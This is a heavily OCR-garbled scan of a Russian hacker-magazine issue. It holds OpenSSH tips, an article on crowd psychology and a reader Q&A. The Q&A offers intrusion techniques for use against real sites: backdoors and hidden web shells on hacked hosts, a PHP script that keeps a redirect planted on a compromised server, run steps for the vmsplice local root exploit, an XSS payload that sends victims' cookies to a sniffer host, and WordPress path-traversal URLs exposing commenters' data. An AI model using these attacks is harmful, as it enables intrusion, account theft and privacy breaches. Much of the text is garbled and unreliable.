{ 

зоскеС_Суре 


= з!:геат 


рго^осоі 


= Ьср 


ѵ/аіі: 


= по 


изег 


= гоок 


сІізаЫе 


= по 


зегѵег 


= /изг/Ъіп/ззк 


зегѵег_агдз 


= -д -Т -і /гоок/ . зз!і/і:иппе1_кеу 



Из чего 

состоит ОрепЗЗН 



88Іі-ас1с1 — вспомогательная программа для добавления личных 
ключей в кэш; 

ззЬ-а^епі — демон, занимающийся кэшированием дешифрованных 
личных ключей; 

зср — утилита для безопасного копирования файлов между хостами; 
8^1р — клиентская программа для зіір-зегѵег; 
зіір-зегѵег — серверная реализация защищенного Лр; 
ззЬ — клиент, обеспечивающий безопасное соединение; 

88ІісІ — демон, ожидающий подключения, выполняющий аутентифи- 
кацию и полностью обслуживающий ззЬ-клиента; 
ззЬ-кеу^еп — утилита для создания и модификации ключей; 
88Іі-кеу8сап — утилита для сбора публичных ключей; 
ззЬ-кеузі^п — помощник при использовании метода аутентифика- 
ции, основанного на проверке хостов. 



Кстати, прописав в ~/ . ззЪ/сопЛід параметры используемых серверов, 
можно с легкостью управлять сразу всей стаей. 

$ѵіт .ззН/сопйд 

Нозі: зегѵегі 

Ноз^Ыате пз . сіотаіпі . ги 
ІІзег абшіп 
НозЪ зегѵег2 

НозЬпаше таіі . б.отаіп2 . ги 
ІІзег зиррогк 

Теперь опросим серверы командой: 

кзЪ.% іог і іп 1 2; сіо ззЪ. зегѵег$і «иркіте»; сіопе 
5:37РМ ир 1 сіау, 23:45, Іизег, ІоасЗ аѵегадез : 0.25, 
0 . 22 , 0.22 

5:37РМ ир51сіауз, 1:49, 0 изегз , Іоасі аѵегадез : 0.25, 
0.25, 0.24 

Как вариант, для этих целей можно использовать интерпретатор Регі 
(пример для десяти подконтрольных серверов) : 

% регі -е ' ІогеасЬ. $і (1 . . 10) {ргіпР 1 ззЬ. зегѵег$і "ирЬіте" 1 } 1 

Если часто приходится работать с несколькими удаленными хостами, 
советую присмотреться к проекту СІизіегЗЗН Г сІизСегззІі.зІ.пеО . Он позво- 
ляет открыть несколько соединений по 55Н и одновременно выполнять на 
них команды. Нужные пакеты уже есть в репозитарии НеЫап/ШшпШ: 

$ зисЗо ар1:іІ:исіе іпзкаіі с1из!:егзз1і 

И запускаем: 

$ сззЬ опе Смо Ыігее 

Параметр РгохуСоттапб позволяет выполнить произвольную команду. 
Для примера подключимся через шлюз к файловому серверу, который 
находится за ИАТ: 

$ѵіт .ззН/сопйд 

Нозі: дакеѵ^ау 

Ноз^Ыаше пз . сіотаіп . ги 
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Нозк Іііезгѵ 

Ноз^Ыаше 192.168.5.201 

РгохуСошшапсІ ззк даЬеѵіау пс -Ѵ7 180 %Ь. %р 

Подключаемся : 

$ ззЬ. Іііезгѵ 

Использование параметра Соп ѣго Шаз і: ег позволяет ускорить доступ к 
удаленному серверу за счет того, что в специальном файле сохраняются 
все параметры предыдущего сеанса, которые и используются при повтор- 
ном подключении. Для примера создадим две НозИ-секции: 

$ѵіт .55Н/сопйд 

Нозк ЗГѴІ 

Ноз^Ыаше 213 . 167 .ХХ.УУ 
СопЪгоІМазЬег уез 

# Здесь %г — имя, %Ъ — хост и %р — порт 
СопЪгоІРакЬ. ~/ . ззк/с1:1-%г-%1і-%р 
Нозі: згѵІІазЬ 

НозШаше 213 . 167 .ХХ.УУ 

СопЬгоІМазЬег по 

СопЪгоІРакЬ. ~/ . ззк/с1:1-%г-%1і-%р 

Теперь на сервере згѵІ выполняем утилиту иргіте. Логинимся на нем 
(чтобы создать локальный сокет для второго подключения), переходим на 
другую консоль и снова запрашиваем статистические счетчики: 

ЬСурО% Сіше ззЬ. згѵІ ирСіше 

5:55РМ ир37с!ауз, 9:19, 1 изег, Іоасі аѵегадез : 0.33, 
0.32, 0.33 

0ш0.77згеа1 ОшО.Обзизег 0ш0 . Оіз зузСеш 
ЬЬур0% ззЬ згѵІ 

ЪЬур1% кіте ззЬ. згѵііазі: иркіте 

5:57РМ ир37сІауз, 9:20, 2 изегз, Іоасі аѵегадез : 0.37, 
0.34, 0.33 

ОшО.ОЗз геаі ОтО.ООз изег ОтО.ОІз зузРет 

Как видишь, при мультиплексировании соединений время выполнения 
команды иргіте на удаленном сервере уменьшилось в 25 раз — настоящее 
турбореактивное ускорение ! 

СЕКУРНЫЕ НОСКИ 

Но это еще не все чудеса. ОрепЗЗН можно использовать как специальный 
ЗОСКЗ-сервер, который поддерживает более гибкое проксирование, чем 
простое перенаправление портов. Например, команда: 

$ ззЬ. — Б1080 изег@с1отаіп. ги 

создает локальный 30СК35-сервер, который ждет подключения на 
Іосаіііозѣ : 1 080. Альтернативный вариант — прописать директиву 

ОупатісРогъгагсів . ззЪ/сопРід : 

$ѵіт.55Ь/сопйд 

НозЪ ргоху 

НозУЯате пз . бошаіп . ги 
БупатісРогмагсІ 1080 

Подключаемся, введя «ззЪ. ргоху». Протестировать работу 50СК55-сер- 
вера можно такой командой: 

$ есЪо -п "СЕТ / НТТР/1 . 0\г\п\г\п" I пс -X 5 -х 
127.0.0.1:1080 \ 

шт. сіотаіп. ги 80 I кеасі -4 



НТТР/1 . 1 200 ОК 

БаСе : Зак, 23 РеЬ 2008 14:27:43 СМТ 
Зегѵег: Араске 
Х-Ромегесі-Ву : РНР/4.4.1 

Теперь носки готовы к использованию: 

$ Ьзоскз ккипсІегЪіггі 

ПОИГРАЕМ В ПЕСОЧНИЦЕ 

В ОрепЗЗН 4.9 появилась долгожданная поддержка сЬгооІ(2) для ззМ, 
контролируемая с помощью опции СкгооФігесНогу. К примеру, заставим 
подключающегося по $гір пользователя ѵѵагех переходить в измененный 
корневой каталог Осіау: 

$ Бибо ѵіт /еіс/55И/55ИсІ_сопПд 

#5иЪзуз1:ет зііір /изг/ІіЪехес/зЕкр-зегѵег 
ЗиЬзузСет з^Ьр іпкегпаі-з^гір 

МаЬск Бзег ѵіагет. 

ХІІРогѵ/агсІіпд по 
АІІомТсрРогмагсІіпд по 
РогсеСотшапсІ іп1:егпа1-з:Еі:р 
СкгооЬБігесЪогу /Осіау 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

Автодополнение хостов можно выполнить за счет использования встро- 
енных средств командной оболочки: 

$ ѵіш ~/ .ЬазЬ._рго1і1е 

сошріере -VI "$(ес1іо ' саЬ ~/ . ззк/кпоѵт_коз!:з I сик -1 1 

-а * ' \ 

I зесі -е з/ , . */ /д I ипід I дгер -ѵ " \ [ " ' ; ) " ззк 

Параноидально настроенные администраторы, возможно, захотят, 
наоборот, зашифровать все ІР и доменные адреса из файла . ззЪ./кпоѵт_ 
Ьозіз. Делается это так: 

$ еско ' НазкКпоѵтНозЪз ' » ~/ . ззк/сопіід 
$ ззк-кеудеп -Н -1 ~/ . ззк/кпоѵт_козкз 
$ кеасі -1 ~/ . ззк/кпоѵтп_козкз 

+ 1 1 1 Т Т2 ЗаХСдО 8иНУ е і А9 2 КиШІКВ7М= | СрОВЗОгОРОРдА+пР+дке 
37трсНА= ззк-гза АААА [ . . . ] □С 



Пакете СІизІегЗЗН в ІІЬипІи уже есть 
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[АННА «МЕН0ѴЦ5НКА» КОНДРАТЬЕВ/ 



Бушующие волны 



массового 

психоза 



ЩЕПКА В МОРЕ ИЛИ КАПИТАН СУДНА? 



В поведении толпы реализуются примитивные психологические механиз- 
мы, знание которых позволяет управлять людьми и событиями. Поэтому, 
чем больше нам известно об этих механизмах, тем труднее нами манипули- 



ровать. 
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г ПРИКЛАДНОЙ УРОВЕНЬ 

Как манипулируюттолпой? Можно ли противостоять 
массовой панике? Как бороться с моббингом? Эти и другие 
вопросы, связанные с психологией масс, задаютсебе самые 
разныеученые. Существует огромное количествотеорий, 
такилииначе объясняющих это явление. Но нас с тобой 
интересует практическое их применение и те проблемы, с 
которыми мы сталкиваемся ежедневно в той или иной со- 
циальной группе — будь то учебный или рабочий коллектив, 
или модная тусовка. 

^ ФЕНОМЕН «ЗАРАЖЕНИЯ» 

С объединением людей в толпу связаны некоторые инте- 
ресные эффекты. Один из них — феномен «заражения». 

Его проявления многообразны: от группового азарта до 
массовых психозов. Представь себе полный зал людей на 
концерте Задорнова. Со сцены рассказали смешной анек- 
дот, и все громко смеются. Ты только что вошел и не слышал 
шутку, однако общее настроение захватывает, и ты тоже от 
души смеешься. Передача эмоционального состояния на 
психофизиологическом уровне от группы к индивиду и есть 
принцип заражения или, по-научному, — циркуляционная 
реакция. Такое заражение может быть как положитель- 
ным, так и отрицательным. Оно стирает индивидуальность 
личности, снижает рольздравого смысла;ты начинаешь 
чувствовать и реагировать «как все». 

У человека, охваченного эмоциональным заражением, по- 
вышается восприимчивость к импульсам, источник которых 
находится внутри толпы, зато снижается восприимчивость 
к импульсам извне. Соответственно, усиливаются барьеры 
против логических аргументов и рациональных доводов. И 
поэтому попытка воздействовать на массулогикой втакие 
моменты может оказаться опасной. Здесь необходимы 
приемы, адекватные ситуации, а если ты ими не владеешь, 
то лучше держаться оттолпы подальше. Добавлю, что фе- 
номен эмоционального заражения не является однозначно 
негативным или позитивным. Он может сопровождать любое 
массовое мероприятие, например, концерттвоей любимой 



рок-группы, совместный просмотр фильма, дружеское 
застолье, игру в СоипІегЭігіке и т.п. 

Принцип «заражения» используют и политические деятели, 
и шарлатаны. Достаточно вспомнить деятельность извест- 
ных финансовых пирамид. Посредством информационно- 
психологическихтехник воздействия (устные формы с 
применением акустических средств; печатная продукция, в 
том числе СМИ; радио, телевидение, интернет) происходит 
своеобразное психическое заражение определенными 
состояниями. Какты понимаешь, понятиетолпы в наш век 
информационныхтехнологий довольно широко. Это не 
только масса людей на стадионе, это и многочисленная ау- 
дитория у экранов телевизора и пользователи Сети. Однако, 
«виртуальная толпа» — лишь частный случай некоторых 
феноменов. 

0 ПРИЕМЫ УПРАВЛЕНИЯ ТОЛПОЙ 

Для манипулирования толпой полезно знать еще один 
феномен. Он заключается втом, что толпа неоднородна. 
Ученые, делая аэрофотоснимки разных массовых сборищ, 
пришли к выводу, что толпа собирается по принципу: ядро, 
периферия. Там, где ядро, влияниетолпы наиболее сильно, 
так как эффект «заражения» аккумулируется. На периферии 
толпа более разрежена, и влияние феномена снижается. 
Для наглядности вспомни толпу поклонников на рок- кон- 
церте. Наверняка ты замечал, что чем ближе к сцене, тем 
ряды плотнее, накал эмоций выше — это ядро. Чем дальше 
отсцены, тем толпа реже и более спокойна. Это периферия. 
Для управления толпой лучше всего использовать перифе- 
рию. Самый известный прием — переключение внимания 
толпы на другой объект. Отвлекать внимание можно чем 
угодно, например, пустить слух об убийстве или автомо- 
бильной катастрофе, как бы ужасно это ни звучало. Люди 
из любопытства пойдут посмотреть, что там случилось, и 
ядро, потеряв часть эмоциональной подпитки с периферии, 
становится более управляемым. 

Еще одним интересным приемом манипулирования являет- 
ся использование ритма. Ученыеустановили, что действую- 




> ІП^О 

• В 60-х годах амери- 
канские посольства 
во многих странах 
«Третьего мира» име- 
ли «на вооружении» 
мощные динамики и 
музыкальные записи в 
стиле рок. Это средс- 
тво использовалось 

в тех случаях, когда 
проходящая около 
посольства антиаме- 
риканская демонстра- 
ция превращалась в 
агрессивную толпу. 

• Самой большой 
ошибкой будет думать, 
что ктолпе примени- 
мы такие же способы 
влияния, что и для ор- 
ганизованной группы. 
Никогда не забывай, 
что неорганизованная 
толпа, объединенная 
лишь эмоциональным 
состоянием, а не об- 
щими целями, опасна 
и непредсказуема. 

Без соответствующей 
подготовки лучше 
даже не пытаться что- 
то сделать. 
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Статья о методах выживания в толпе 




щая толпа, в отличие от экспрессивной, 
аритмична. Поэтому громкий ритмичный звук 
способствует соответствующему превращению 
толпы. Правда, следует заметить, что противо- 
действие разным видам толпы требует разных 
ритмов. 

Как я уже говорила, индивидуальность в 
толпе размывается. Человек чувствует себя 
безличным и безнаказанным. Отсюда возник 
еще один способ манипулирования, основанный 
на восстановлении идентичности индивидов. Например, во 
время демонстрации на крышах зданий размещаются хо- 
рошо заметные камеры или высылаются мобильные группы 
телерепортеров. Демонстративные действия репортеров 
способствуют возвращению идентичности и снижению 
эффекта заражения. 

Н МЕХАНИЗМ ПАНИКИ 

В психологии различают два вида паники: массовая и 
индивидуальная. Паническое состояние часто бывает 
вызвано страхами, которые не соответствуют объективной 
опасности. Из-за этого панику можно охарактеризовать как 
ужас, внушенный кажущейся опасностью. Паника может 
быть вызвана и вполне реальной угрозой, но решающим 
фактором почти всегда становится психическое состояние 
субъекта (личности, общества, группы или толпы]. Конечно 
же, паника не возникает сама по себе, существует целый ряд 
предпосылок, которые являются благодатной почвой. 
Психологами и социологами выделено несколько условий 
для возникновения паники: 

• социальные факторы (резкое изменение валютного курса, 
государственный переворот, надвигающееся землетрясе- 
ние); 

• физиологические факторы (усталость, голод, алкогольное 
опьянение, некомфортные климатические условия); 

• общепсихологические факторы (испуг, удивление, неожи- 



Масса неоднородна: чем ближе к ядру, тем плотнее 



данность происходящего). 

Конечно, это не все факторы, а только некоторая часть. 
Главное, что ты должен понимать: чем больше негативных 
условий разного характера, тем выше вероятность возник- 
новения паники. 

При этом механизм распространения паники основан все на 
том же феномене заражения. Сначала сильный испуг воз- 
никаету одного или нескольких человек. Испуг сопровож- 
дается криками (например, «Пожар!»), иногда несвязными, 
или проявляется хаотичными движениями. Затем страх 
передается остальным. Но бывает и так, что панику вызыва- 
ет не реальное происшествие, а некое страшное ожидаемое 
событие, катализатором которого может стать словесное и 
какое-либо другое обозначение — резкий громкий звук или 
что-то еще. 

Приведем пример из истории. В Первой Мировой войне 
немцы применяли отравляющие газы — страшное оружие, 
против которого был бесполезен опыт бывалых солдат и 
предсмертные мучения от которого превзошли все виденное 
ими ранее. Это вызвало чрезвычайную напряженность в 
войсках. Зафиксированы случаи, когда газов не применяли, 
но кому-то из солдат что-то казалось, и испуганный крик 
«Газы!» обращал в бегство целые батальоны. Очень трудно 
одному индивиду противостоять толпе, когда та ударилась в 
панику. Даже самый отъявленный индивидуалист поддается 
гипнозу масс. 




> ѵѵагпіпд 

Одна из главных це- 
лей психологического 
заражения — форми- 
рование однородного 
мнения в группе 
людей в условиях 
выбора. Поэтому мето- 
дами психологическо- 
го заражения активно 
пользуются некоторые 
политики и СМИ в 
процессе избиратель- 
ных кампаний. 
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Два основных правила, которые 
стоит помнить: держись оттолпы 
как можно дальше и, если уж ре- 
шил влиться в толпу, подумай, как 
ты собираешься из нее выбирать- 
ся, если вдруг что-то случится. 

В МОББИНГ 

Моббинг — от английского тоЬ 
(толпа) — групповое психологи- 
ческое притеснение кого-либо со 
стороны нескольких человек, чаще 
всего в рабочем коллективе. Если 
еще проще, то это травля толпой 
одного человека. Моббинг включа- 
ет в себя постоянные негативные 
высказывания, критику, соци- 
альную изоляцию внутри группы, 
исключение из социальных кон- 
тактов, распространение о челове- 
ке заведомо ложной информации и 
т.п. Подобный феномен имеет под 
собой психологические корни. И 
одной из причин моббинга может 
быть страх. 

В коллективах нередко проявляется 
настороженное отношение ктому, 

кто «не такой, как все». Причем, моббинг по причине страха 
не возникает в тех сообществах, которые сформированы «с 
нуля». Там еще нет деления на «свой и чужой». А вотесли 



Некоторые 
подвиды толпы 

• Окказиональная толпа (от англ, оссазіоп — случай- 
ность) — скопление людей, собравшихся поглазеть на 
неожиданное происшествие, например, автомобиль- 
ную катастрофу. 

• Конвенциональная толпа (от англ, сопѵепйоп — ус- 
ловность) собирается по поводу заранее объявленного 
события (рок-концерт, футбольный матч). 

• Экспрессивная толпа (от англ, ехргеззіоп — выраже- 
ние) — толпа, ритмически выражающая ту или иную 
эмоцию: радость, энтузиазм, возмущение. Речь идет 

о людях, скандирующих лозунг на митинге, громко 
поддерживающих любимую команду или клеймящих 
судью на стадионе. 

• Экстатическая толпа (от англ. есзГазу — экстаз) 

— экстремальная форма экспрессивной толпы. В экста- 
зе люди могут самозабвенно истязать себя. 

• Агрессивная толпа (от англ. А§§ге55Іѵе — напорис- 
тый) — толпа, эмоциональная доминанта которой это 
ярость и злоба. 

• Паническая толпа (от англ, рапіс — переполох, трево- 
га) — толпа, объятая ужасом; каждый в ней стремится 
избежать реальной или воображаемой опасности. 




Феномен эмоционального заражения на рок-концерте 



группа устоявшаяся, шансы на возникновение моббинга 
повышаются, кактолько в таком коллективе появляется 
некто с достаточно неординарным поведением, внешнос- 
тью, умениями и т.д. Еще одной причиной возникновения 
моббинга может стать «внутреннее напряжение» группы. 
Например, если часть членов семьи долго копила какие-то 
внутренние недовольства, разногласия не обсуждались, а 
замалчивались, то новый человек, скажем, невеста, может 
подвергнуться психологической травле, своим появлением 
вскрывая и та к уже накопившуюся агрессию. И, наконец, 
причиной моббинга можетбыть безделье. Да, не удивляйся. 
Наиболее яркий пример моббинга от безделья — недоста- 
точная загруженность части сотрудников на работе. Скажем, 
один человек все время вкалывает, а другие бьют баклуши. 
Тогда те, кто вынужденно халявит, по отношению кзагру- 
женному могутзанять позицию: что это он тут все работает и 
работает, никак выслужиться перед начальством хочет? — и 
давай «травить». 

Думаю, читая статью, ты задаешься закономерным воп- 
росом: бороться-то с этим как? Что даетзнание причин 
феномена? Прежде всего, в любой группе, будьто рабочий 
или учебный коллектив, общайся как можно более ровно, 
вежливо. Не стремись навязывать свое эмоциональное 
расположение, ввязываться во внутренние разборки или 
привлекать излишнее внимание экстравагантным пове- 
дением. Стань наблюдателем. Подмечай, что происходит 
в группе, и особенно, что происходит вокругтебя. Жертва 
моббинга постоянно подвергается давлению, но важно 
помнить о причинах возникновения такого притеснения: 
не искать их лишь в себе. Как говорят врачи, правильный 
диагноз — уже 50% лечения. Так и в случае с моббингом: 
правильно интерпретировать причины травли — уже 50% 
решения проблемы. тг 




> ІП^О 

• Приведем пример 
психологической эпи- 
демии. Во время вой- 
ны в Чечне несколько 
десятков девочек были 
госпитализировали с 
признаками острого 
отравления. Они сдали 
все анализы, но вред- 
ных веществ выявлено 
не было. Оказалось, 
что рвота и судоро- 
ги были вызваны 
военным положением, 
страхом и постоянным 
стрессом. 

• Формы психологи- 
ческого заражения: 
азарт болельщиков на 
стадионах, трудовой 
энтузиазм, чувство 
огромной силы и 
единения на митингах 
политических партий. 
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Задавая вопрос, подумай! Не стоит задавать откровенно ламерские вопросы, 
ответы на которые ты при определенном желании можешь найти и сам. Конкре- 
тизируй! Я не телепат, поэтому присылай как можно больше информации. 



О: Не знаешь каких-либо альтернатив Маіі.ги 
Агенту? 

А: Помимо бета-версии ОІР Іпйит протокол от тай. 
ги также поддерживает небезызвестный в кругах 
ІМ’шников пейджер &МІ_. Вотнекоторые его фичи: 

• компактный и удобный пользовательский 
интерфейс; 

• передача сообщений без задержки; 

• окно чата со вкладками (как в &Н0, тігапсіа, ОІР); 

• удобная форма поиска пользователей; 

• отличный антиспам-контроль; 

• «тихий режим» (только свои контакты); 

• рогІаЫе зойѵѵаге (портативная программа 

— не привязывается к системе, можно хранить 
на флешке и т. д.); 

Прога не тормозит при работе с медленными 
сііаіир- или дргз-соединениями (в отличие 
от стандартного клиента) и являетсобой наш 
любимый ореп вой гее :). 

Скачать клиент можно на его официальном 
са йте : ЫйрУ/апбгтЯ.ога.ги 

О: Занимаясь 5Е0, столкнулся с проблемой 
кражи доров. Подскажи, как обезопасить 
себя от этой напасти? 



А: Если ты делаешь дорвей на хосте, взломан- 
ном через пабликуязвимость на установлен- 
ном там движке, то можно закрыть каталоге 
этим движком сбтосГом, сменить хеш пароля 
админа на что-нибудь вроде ІаІаІ& л %$. 

Но обычно это все мало помогает, и дорвейщи- 
ки сталкиваются с кражей доров роз* ^асіит, 
поэтому запомни следующее правило: чтобы 
было проще вернуть свой дор, оставляй как 
можно больше бэкдоров и шеллов на взломан- 
ном хосте, не забывая прятать время моди- 
фикации файлов через команду ѣоисЪ. -I 
ГодМесяцДень ЧасМинутыСекунды шелл . 
ріір. После кражи дора первым делом найди 
и удали шеллы своих недоброжелателей (это 
можно сделать командой Еіпд. / -тЪіте - 
60 1 дгер .рЧір\, затем меняй переадресацию 
на свой шоп и обезопась себя следующим 
рЬр-сценарием: 

<?рЬр 

ідпоге_изег_аЬогС (кгие) ; 

зе1:_біте_1іті1: (0) ; 

ѵйіііе ( ! із_бі1е ( ' збор.ЗаС ' ) ) 

{ 



@сЪто(3( ' /уат /ѵгтз /ЪРтІ / 
саЕаІод ' , 0777 ) ; 

$ЪехЫИ:= ' <?рЪр 

Ьеасіег ( "ЬосаЕіоп: ЪРЕр: //твой_шоп. 
сош" ) ; 

?>' ; 

$бр = Обореп ( " /ѵаг/ѵлѵм/ЪктІ/ 
саьаіод/іпсіех.ріір" , "ѵ?" ) ; 

@Н1оск ($бр, ЬОСК_ЕХ); 

@бргтз ($бр, $1;ехШ:) ; 

@Н1оск ($бр, ЬОСК_Ш) ; 

(ібсіозе ( $бр) ; 
зіеер ( 5) ; 

} 

?> 

Залей скрипте этим кодом (предварительно 
изменив пути на те, где у тебя лежал дорвей) 
в какой-либо каталог на сервере, доступный 
из веба, и запусти его в браузере. После этого 
браузер можешь закрывать :). Скрипте пери- 
одичностью раз в 5 секунд будет перезаписы- 
вать файл с переадресацией на твой собствен- 
ный, так что горе-воры оченьудивятся, когда 
запишутсвой файл с переадресацией, и на его 
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месте тут же появится другой. Немного информации по теме кражи доров 
ты сможешь найти тут: Ыір://іогит.аІаѵтесі.сот/5боѵѵ1бгеасІ.рЬр?1=1 342 



О: Какой Іосаі гооі ехріоіі под не самые старые ядра Ііпих можешь 
посоветовать, как самый эффективный? 

А: По долгу службы я чаще всего сталкиваюсь с ядрами 2.6.2х ветки. Под 
них существует несколько паблик сплойтов, но моим любимым явля- 
ется І_іпих Кегпеі 2.6.17 — 2.6.24.1 ѵтзріісе 1_осаІ Рооі Ехріоіі ( Ыір:// 
тіІУѵОгт.сот/ехрІоіІз/5092 ). С ним я получаю рут в два шага: 

1) компилюдсс -збабіс -Ипо-іогтаі: -02 ѵтзріісе . с -о ѵтзріісе-, 

2) запускаю (./ѵтзріісе), жду 2 секунды и наслаждаюсь правами рута :). 

0: Нашел Х55 на серьезном сервисе, но все нехорошие символы, 
кроме < и >, жестко фильтруются, как быть? 

А: Тоже недавно столкнулся с этим вопросом и придумал элегантное 
решение с объединением массивов и функции ИготСЪ.агСойе() в 
Іаѵазсгірі. Смотри. У нас имеется адрес сниффера, который отлавливает 
приходящие на него кукисы, например ЬЦрѴ/зпібсот/зпі^ег.рЬрЗісЫ тѵт 
передаются куки]. Засовываем этот адрес в нехитрый рЬр-скрипт: 

<?рЪр 

$зібе= 'Ьббр: //зпіб . сот/зпіббег .рЪр?ісІ= ' ; 
бог ($і=0;$і<25б;$і++) { 

$агг [сЬг ( $і ) ] = $і ; 

} 

бог ( $і=0 ; $і<збг1еп ($зібе) ;$і++) { 

$і!= (збгіеп ($зібе) -1) ? ргіпб $агг [зиЪзбг ( $зібе , $і , 

1) ] . 

' , ' : ргіпб $агг [зиЬзбг ( $зібе, $і , 1 ) ] ; 

} 

?> 

Получаем на выходе строку символов «104 , 116 , 116 , 112 , 58 , 47 , 47 
,115,110,105,102,46,99,111,109,47,115,110,105,102,102,1 
01,114,46,112,104,112, 63 , 105 , 100 , 61 » и составляем на основе 
полученных данных свой код Х55: 

Ьббр : // зібехзз . сош/хзз .рЬр?хзз=хзсгірб>ѵаг 
шуАггау ; шуАггау = пеѵ/ Аггау ( ) ;шуАггау [1] = йосишепб . 
соокіе ;шуАггау [ 0 ] = Збгіпд . бгошСЬагСойе (104 , 116 , 116 , 11 
2,58,47,47,115,110,105,102,46,99,111,109,47,115,110,10 
5,102,102,101,114,46,112,104,112,63,105,100,61) ; збгіпд 
= шуАггау . зоіп (1) ; Іосабіоп . Ьгеб = збгіпд</зсгірб>< 

В результате, такая конструкция обойдет большинство фильтров (на тот 
же самый знак «+», который используется в большинстве случаев), и 
долгожданные кукисы будут у тебя! 

0: Сколько всего существует сайтов с Соодіе РК=1 0? 

А: Сложный вопрос. С каждым обновлением РП сайтов значительно 
меняется, но каноническими (и авторитетнейшими) «десятками» могут 
считаться следующие страницы: 

• ЫірУ/ѵѵѵѵѵѵ.асіоЬе.сот — АбоЬе (еще, по меньшей мере, семь страниц 
на сайте адоба имеют РР=1 0); 

• ЬирУ/ѵѵѵѵѵѵ.ѵѵЗ.ога — ѴѴогісІ ѴѴібе ѴѴеЬ Сопзогііит; 

• ЬирУ/ѵѵѵѵѵѵ.тасготесІіа.сот — Масготебіа; 

• ЫірУ/ѵѵѵѵѵѵ.епегду.доѵ — Министерство Энергетики США; 

• ЫірУ/ѵѵѵѵѵѵ.аррІе.сот/диіскІіте — Арріе — ОиіскТіте; 

• ЫірУ/ѵѵѵѵѵѵ.кеіо.ас.ір — Кеіо Упіѵегзііу; 
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• ЬирѴАллллл/.паза.аоѵ — Ыаііопаі Аегопаибсз 
а псі Брасе Асітіпізіхабоп; 

• Ыір://ѵѵѵѵѵѵ.аррІе.сот — Арріе Сотриіегз 
(еще, по меньшей мере, пять страниц на сайте 
эппла имеют РР=1 0); 

• Ьир:/Алллл/ѵ.аооаІе.сот — боодіе Беагсб; 

• Ьир://іідза\л/.\л/3.огд/сз5-ѵаІісІаІог — ѴѴЗС С8Б 
Ѵаіібаііоп Бегѵісе; 

• ЬіІр://ѵѵѵѵ\ллегсіт.огд — ТЬе Еигореап 
РезеагсЬ Сопзогііит Гэг Іпіогтаіісз а псі 
МаіЬетайсз; 

• Ьі1р://ѵѵѵѵ\л/.1с5.гпі1.ес1и — МІТ бабога^огу Іюг 
СотриІегБсіепсе; 

• ЬПрѴАллллл/.пзРаоѵ — ЫабопаІБсіепсе 
Роипбабоп; 

• ЬНр://ѵѵѵѵ\л/.глісго5оК.сот — МісгозоЙ; 

• ЬПр:/Аллллл/.арасЬе.огд — Арасбе БоЙѵѵаге 
Роипсіаііоп; 

• Нир:/Алллл/у.ууЫ1еЬоизе.доу — Тбе ѴѴЫіе Ноизе; 

• НирѴАлл/ѵѵѵ.геаІ.согп — Реаі Месііа; 

• Ьир://\л/уѵѵѵ.іЬт.сот — I В М ; 

• Ьир:/Аллллл/.сІ5со.сот — Сізсо; 

Списоксайтов с РР=9ты можешь найти 
здесь: ЬНрѴАмлл/ѵ.Ьгапб-геп.сот/зЬоѵѵрозІ. 
рЬр?р=2957&розісоипІ=1 1 . 

О: Замучался с регулярными выражениями! 
Подскажи, где бы их можно было проверять 
на валидность, что называется, не отходя от 

кассы? 

А: РІедавно открытый сервис Заѵазсгірі Редех 
Еѵаіиаіог ( Ьир:/А/ѵѵѵѵѵ.рсге.ги/еѵаІ ) предостав- 
ляеттакую возможность! Сервис, основанный 
на іаѵазсгірі, позволяет прямо в окне браузера 
отслеживать результат выполнения твоих 
регулярных выражений. РІемного о проекте от 
его создателей: 

«Проект РСРЕ-РИ был задуман и разработан 
с целью помочь начинающим программистам 
изучить принципы и основы работы с регуляр- 
ными выражениями. 

Проект нацелен на освещение информации о 
регулярных выражениях стандарта РСРЕ (Регі- 
сотраІіЫе гедиіаг ехргеззіопз) в связи с тем, 
что последние получили наибольшее распро- 
странение и применение в различных языках 
программирования (Регі, РЬр, ^ѵазсгірі и т.п), 
а также в таких сложных программных комплек- 
сах, как веб-сервер АрасЬе». 

О: Как узнать, сколько страниц сайта нахо- 
дятся не в зирріетепі гезиМз (сопли, песок) 

у Гугла? 

А: Очень просто. Для этого существуют спе- 
циальный запрос «зііе : зііе . сот/* *» или 
«зііе: зііе. сот/&». В результате его вы- 
полнения боодіе покажеттебе страницы сайта, 
находящиеся в основном индексе. 

О: Как можно посмотреть ІР-адреса и е-таіі 
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людей, которые оставили свои комментарии 
на блоге >ѴогсІРге55? 

А: Недавно обнаруженная уязвимость в 
ѴѴогсІРгезз версий до 2.5 с моей доработкой 
предоставляеттебе такую возможность :). Итак, 
чтобы посмотреть полную конфиденциальную 
инфу комментаторов на блоге, ты должен заре- 
гистрироваться и пройти по адресу Ы:1р://Ыод. 
сот/ѵур233/?саІ=1 .рЬр/../../..А./ѵѵр%252бас1тіп/ 
есП1:%252бсотппеп1:5 . Также эта бага позволяет 
тебе всячески поиздеваться над блогом недоб- 
рожелателя, например: 

• редактировать структуру ссылок ( ЫірУ/Ыод. 
сотАлф233/?саІ=1 .рЬр/../../..Л.Алф%252бас1тіп/ 
орііопз%252с1регтаІіпк ): 

• активировать и деактивировать плагины 

( ЬіІр://ЬІод.сот/ѵѵр233/?саІ=1 .рНр/.. 
ѵѵр%252с1ас1ппіп/рІидіпз] : 

• активировать и деактивировать темы 
оформления ( ЬЦр://Ыоа.сот/ѵѵр233/?саІ=1 . 
рбр/../../../../ѵѵр%252сіасІтіпЛЬете5 І: 

• просматривать все посты блога (включая 
черновики) ( Ьир://Ыод.сот/\лф233/?саі=1 . 
рЬрЛ./../../..А/ѵр%252бабтіп/есІі0 . 

И многое другое :). Ты можешь сам подставлять 
названия файлов из каталога ./ѵѵр-асітіп и 
ставить свои опыты над Вордпрессом. 

Р.З.По непроверенной информации бага рабо- 
таеттолько на ѴѴіпсІоѵѵз-платформах, но, так как 
я занимался уязвимостью только на вин де, на 
никсах можешь поэкспериментировать сам. 

Работаю с буржуйской партнеркой, кото- 
рая платит только посредством банковских 
переводов (ваерами или чеками). Где бы 
мне обменять эти самые ваеры и чеки на 
вебмани? 

А: По собственному опыту могу посоветовать 
сервис ЬНрѴ/егтопеѵ.сот . Помимо обмена 
всех онлайн валют друг на друга, здесьты 
можешь обналичить чеки, ваеры или АСН сіігесі: 
сіерозіі. Обычно обналичка чека с помощью 
этого сервиса происходит следующим образом: 

1) Чек перенаправляется в офис сервиса, 
который находится в США. Реквизиты при этом 
выдает служба поддержки после одобрения 
заявки; 

2) Обналиченные деньги можно получить 
двумя способами: через платежную систе- 
му ѴѴеЬМопеу Тгапз^ег (комиссия + 3%) или 
Фетхард (комиссия 2%). Срок обналичивания 
